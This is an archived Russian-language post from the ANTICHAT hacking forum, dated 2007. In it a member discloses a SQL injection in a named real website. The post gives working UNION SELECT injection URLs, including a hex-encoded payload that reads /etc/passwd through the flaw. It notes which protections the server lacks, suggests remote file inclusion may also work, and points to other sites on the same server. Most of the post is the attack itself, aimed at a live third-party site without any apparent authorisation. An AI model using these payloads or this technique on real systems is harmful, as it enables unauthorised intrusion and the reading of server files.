ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.11.2007, 18:10
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
www.maika.by
вот сама скуля:
Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,5,6,7,8,9,10/*
мускул 5 ветки, file_priv нет, доступа к mysql.user тоже нет, ковычки фильтруются
но интересно другое, эта скуля позволяет инклюдить файлы например:
Код:
http://www.maika.by/index.php?path=products&id=-45%20union%20select%201,2,3,4,0x2F6574632F706173737764,6,7,8,9,10/*
инклюдит /etc/passwd, данные из 5 колонки в чистом виде передаются в функцию main()
Скорее всего возможен инклюд, не только локальных файлов, но у меня неполучилось это проверить, (слишком долго связывается с народом)
на серве есть еще несколько сайтов подобной тематики
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид